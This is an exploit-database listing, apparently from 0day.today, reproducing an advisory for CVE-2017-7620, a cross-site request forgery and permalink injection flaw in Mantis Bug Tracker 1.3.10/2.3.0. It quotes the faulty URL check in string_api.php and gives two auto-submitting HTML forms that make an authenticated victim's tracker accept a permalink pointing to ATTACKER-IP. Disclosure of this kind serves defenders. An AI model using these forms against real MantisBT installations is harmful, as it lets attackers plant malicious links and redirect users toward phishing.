[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery Vulnerability

Author
hyp3rlinx
Risk
[
Security Risk Low
]
0day-ID
0day-ID-27813
Category
web applications
Date add
21-05-2017
CVE
CVE-2017-7620
Platform
php
[+] Credits: John Page a.k.a hyp3rlinx  
 
Vendor:
================
www.mantisbt.org
  
Product:
=========
Mantis Bug Tracker
1.3.10 / v2.3.0
 
 
MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases.
 
 
 
Vulnerability Type:
========================
CSRF Permalink Injection
 
  
CVE Reference:
==============
CVE-2017-7620
 
 
 Security Issue:
================
Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage.
 
Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes.
Line: 270
 
# Check for URL's pointing to other domains
 
if( 0 == $t_type || empty( $t_matches['script'] ) ||
     
    3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
 
     
 
    return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
 
}
 
 
 
# Start extracting regex matches
 
$t_script = $t_matches['script'];       
$t_script_path = $t_matches['path'];
 
 
 
 
Exploit/POC:
=============
<form action="http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST">
<script>document.forms[0].submit()</script>
</form>
 
OR
 
<form action="http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST">
<script>document.forms[0].submit()</script>
</form>

#  0day.today [2024-11-16]  #